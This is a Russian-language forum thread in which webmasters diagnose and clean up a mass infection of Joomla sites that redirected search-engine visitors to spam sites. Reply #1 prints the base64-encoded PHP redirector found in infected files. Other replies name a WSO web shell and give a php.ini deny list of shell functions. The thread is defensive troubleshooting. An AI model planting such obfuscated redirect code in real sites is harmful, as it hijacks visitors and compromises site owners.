Переадресация, Редирект, Вирус

  • 51 Ответов
  • 28162 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

asdf27

  • ***
  • 120
  • 7
Доброго времени, форумчане.

Столкнулся с проблемой: со всех входящих ссылок происходит переадресация. Т.е. если ввести в ПС адрес сайта, а потом перейти, он перекинет сперва на http://goooogle.osa.pl, а потом по своему усмотрению (казино или диета). Если вбить напрямую, откроет сайт без проблем.

На VPS'ке дебиан, крутится десяток сайтов, все на J 1.5. И на всех такая байда. htaccess чистый.

Для пробы закидывал чистый index.html, с ПС идет нормально. Дальше начал рыть в index.php:

После удаления 21-ой строчки
Код
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

с ПС переходит, хоть и ругается ошибками.

Дальше я пошел в файл includes/defines.php и снова нарыл строку, после удаления которой с ПС сайт открывает, но так же, с ошибками
Код
$parts = explode( DS, JPATH_BASE );

Куда дальше?  !
« Последнее редактирование: 06.11.2011, 02:54:52 от asdf27 »
ICQ 8178914

*

asdf27

  • ***
  • 120
  • 7
Re: Переадресация
« Ответ #1 : 06.11.2011, 02:00:53 »
Разобрался... Жаль что никто не помог, сэкономил бы время.

Был вирус, который редиректил на поиск, после на нужный сайт.

1. В теле php файла плагина найден код
Код
("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhbmRleC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtYWlsLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ29vb29nbGUub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

Найти не сложно, у меня в 4000+ файлах был :) в самой шапке.

Далее, на сайте http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ раскодировал, увидел присутствие урла, на который редиректит сайт.

Ну и через Notepad++ поисках в файлах - замена. Только муторно теперь, 10+ сайтов на серваке и каждый надо скачать, почистить и залить обратно :)
ICQ 8178914

*

fedos23

  • ***
  • 35
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #2 : 29.12.2011, 13:27:28 »
А через что хакнули? неизвестно?
У меня такая же байда...

*

nsfgh

  • *
  • 8
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #3 : 29.12.2011, 19:33:09 »
Тоже самое сегодня случилось, просто восстановил из резервной копии. В логах техподдержка хостинга не разобралась.

*

asdf27

  • ***
  • 120
  • 7
Re: Переадресация, Редирект, Вирус
« Ответ #4 : 05.01.2012, 16:14:31 »
А через что хакнули? неизвестно?
У меня такая же байда...

На многих папках 777 стояли права. Но больше думаю на забытый, не удаленный Total cmd с сохраненным паролем.
ICQ 8178914

Re: Переадресация, Редирект, Вирус
« Ответ #5 : 07.01.2012, 09:15:13 »
аналогичная проблема, редирект из поисковых систем.
посмотрел сайт, посмотрел здоровые файлы, не пойму, зачем надо было удалять require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
эта строка идёт в стандарте.

в индексе удалил почти такой же код Base 64, всё равно редиректит, как и от куда, не пойму.

Re: Переадресация, Редирект, Вирус
« Ответ #6 : 07.01.2012, 09:16:08 »
хакнули скорее всего через FTP, total CMD.

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
Re: Переадресация, Редирект, Вирус
« Ответ #7 : 07.01.2012, 11:34:42 »
И вам переписали все файлы. Я так понял, это был акт новогоднего вандализма. Надо перезаливать и вычищать.

Re: Переадресация, Редирект, Вирус
« Ответ #8 : 07.01.2012, 17:44:40 »
а что перезалить?? поискал выборочно, не вижу больше нигде такого кода.
index я вычистил, не пойму, что сейчас срабатывает?

*

oriol

  • ******
  • 1053
  • 96
Re: Переадресация, Редирект, Вирус
« Ответ #9 : 07.01.2012, 17:57:42 »
делай бекап распаковывай но локалке и через поиск в  Total Commander  ищи

потом в php.ini выставь так
Код
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории


Re: Переадресация, Редирект, Вирус
« Ответ #11 : 07.01.2012, 19:28:38 »
инфицируются в основном два файла, но местами больше

это defines.php и index.php

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
Re: Переадресация, Редирект, Вирус
« Ответ #12 : 07.01.2012, 20:04:18 »
Это новогодняя вирусная атака. Почти 100% перегажены почти все файлы. Текст реплейсер найдет, какие именно :)

Re: Переадресация, Редирект, Вирус
« Ответ #13 : 08.01.2012, 07:58:02 »
Пострадавшие, напишите на каком хосте.
Мои личне наблюдения, хакнули сайты только на хосте timeweb, остальные ресурсы не пострадали.
Вывод - это не тотал командер.


*

asdf27

  • ***
  • 120
  • 7
Re: Переадресация, Редирект, Вирус
« Ответ #15 : 08.01.2012, 19:10:54 »
У меня hc.ru . Для поиск хорошо подходит Notepad++.
ICQ 8178914

Re: Переадресация, Редирект, Вирус
« Ответ #16 : 08.01.2012, 19:46:42 »
Ясно, значит не только timweb.
Но пришли со стороны хостера, сейчас логи буду изучать.

Re: Переадресация, Редирект, Вирус
« Ответ #17 : 10.01.2012, 19:46:29 »
атака продолжается, только я всё зачистил, поменял все пароли и явки, два дня, все сайты опять загажены, один пациент очень сильно, загажены все php файлы, в одном файле по 10 раз, это трындец.....

Кстати не всё на CMS Joomla.

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
Re: Переадресация, Редирект, Вирус
« Ответ #18 : 10.01.2012, 21:26:32 »
Разве что перенести сайты на другого хостера, разбить на несколько аккаунтов, перед этим сменить пароли администраторов, залить поверх базы данных (снести все файлы и залить свежие версии).

*

madal

  • **
  • 15
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #19 : 10.01.2012, 22:02:05 »
Сегодня сносил тот же самый вирус. Написали скрипт который все файлы заменял. Найдено аж 106тыс зараженных файлов.


*

magyar

  • **
  • 15
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #21 : 11.01.2012, 13:40:01 »
такая же байда больше 60 сайтов с этой хренью, 95% Joomla от 1.5.17 до 1.5.25 и 1.7.3, wordpress точно так же взломан, еще 4 сайта не на нашем хостинге. сейчас восстанавливаюсь, но что предпринять для предотвращения инцидента?

*

magyar

  • **
  • 15
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #22 : 11.01.2012, 13:42:00 »
как думаете есть ли смысл в отдел "К" обращаться?

*

flyingspook

  • *****
  • 3606
  • 236
Re: Переадресация, Редирект, Вирус
« Ответ #23 : 11.01.2012, 14:12:18 »
отдел "К" обращаться должен замученный вами хостер, а не вы
а вам необходимо на столько его замучить, или просто всем съехать разом и негатив написать везде, тогда он зашевелиться быстрее ^-^

*

asdf27

  • ***
  • 120
  • 7
Re: Переадресация, Редирект, Вирус
« Ответ #24 : 11.01.2012, 17:51:34 »
106к... Сколько же у вас сайт весит? :)
Вся проблема, как мне кажется, в правах на папки. Когда несколько доменов, аппач работает под одним юзверем, и сломав один домен, вирь легко пробирается в другие папки.

Всю ночь провозился со своим debian, но php как cgi так и не смог заставить работать. Видимо, придется менять хоста. Уже запарился чистить.
ICQ 8178914

*

n55

  • *
  • 4
  • 0
Re: Переадресация, Редирект, Вирус
« Ответ #25 : 12.01.2012, 20:32:39 »
У меня на Sweb также все сайта на Joomla заражены.
Причем на одном - всего два файлика, а на другом - ооочень много, больше сотни.




*

shapeout

  • **
  • 18
  • 0
  • все что связано с велосипедами - www.veloarena.ru
Re: Переадресация, Редирект, Вирус
« Ответ #27 : 14.01.2012, 14:21:06 »
Всем привет.
У меня тоже до НГ сайты хакнули.
Как я понял у меня было 4 вируса.
один - это eval(base64_decode потом идёт куча всего, что зашифрованно. (в основном вирус который редиректор)
второй - это шелл, в моём случае WSO 2 лежал в components/com_search файл называется class.php Если его внимательно посмотреть, то можно заметить куски того "зашифрованного гамна" из которого собирается первый  вирус, но это моё предположение. Еще нашел один шелл, один-в-один как этот, тока лежал в папке mod_myblog_arhive, внутри шелла есть описание его и кем написан.
Код
  * WSO 2
 * Web Shell by oRb
третье - это в папке plugins лежит папка mod в которой есть архив (сам себя заархивированный) и собсно сам по себе вирус. Он, как я понял, занимается спапом. Я просто снёс папку и всё. Особо разбираться некогда было.
четвертое - это всем уже (наверное) известный редиректор. :) сам редиректор выглядит как
Код
if(preg_match('!MIDP|WAP|Windows.CE и далее куча-куча перечислений
и второй
Код
<script>b=new функция, потом всё в зашифрованном виде типа [b]-t+число[/b]куча-куча
и всё это расшифровывается eval( - собсно по этому выражению я и искал.
Искал я всё это безобразие фаром по тексту в файле. Муторная скажу я Вам работёнка, но уж лучше в ручную, чем чё нить важное потереть... Возможно, что всё мной рассказанное - это одно целое.
Как я боролся.
Первым делом в корень сайта кинул файл .ftpaccess - с содержанием
Код
<Limit ALL>
Allow from 127.0.0.1 // здесь IP разрешенному доступ
Deny from all // всем (остальным) запретить
ListOptions "+a" // скрыть все файлы начинающиеся с точки
</Limit>
Можно еще в Google порыть, найти еще настроек.
Начал искать по тексту вируса, в каких еще файлах встречается... На всякий пожарный делал копии, изучал и искал. Собсно всё.
Ща еще базу буду проверять, вдруг там тоже нагадили.

Вот теперь сижу и думаю, как базу подчистить? Я там стока интересного нашел... Никто случаем не знает?
« Последнее редактирование: 15.01.2012, 00:42:42 от shapeout »

*

oriol

  • ******
  • 1053
  • 96
Re: Переадресация, Редирект, Вирус
« Ответ #28 : 14.01.2012, 15:25:30 »
Вот htaccess от Nicholas K. Dionysopoulos ведущего разработчика AkeebaBackup.com
возможно кто то что то найдет для себя полезное

Спойлер
[свернуть]

Это своего рода шаблон который требует некоторых изменений
__________________________________________________________________________

Также что то можно использовать отсюда

Спойлер
[свернуть]


Re: Переадресация, Редирект, Вирус
« Ответ #29 : 24.01.2012, 20:03:31 »
Та же проблема все сайты на Joomla заражены. Очистил и удалил все ftp аккаунты и что, через день та же хрень все заражены. Написал скриптик на python если нужно могу выложить, для поиска и удаления строки eval. Но главная причина понять почему так происходит, может быть нужно права расставить правильные.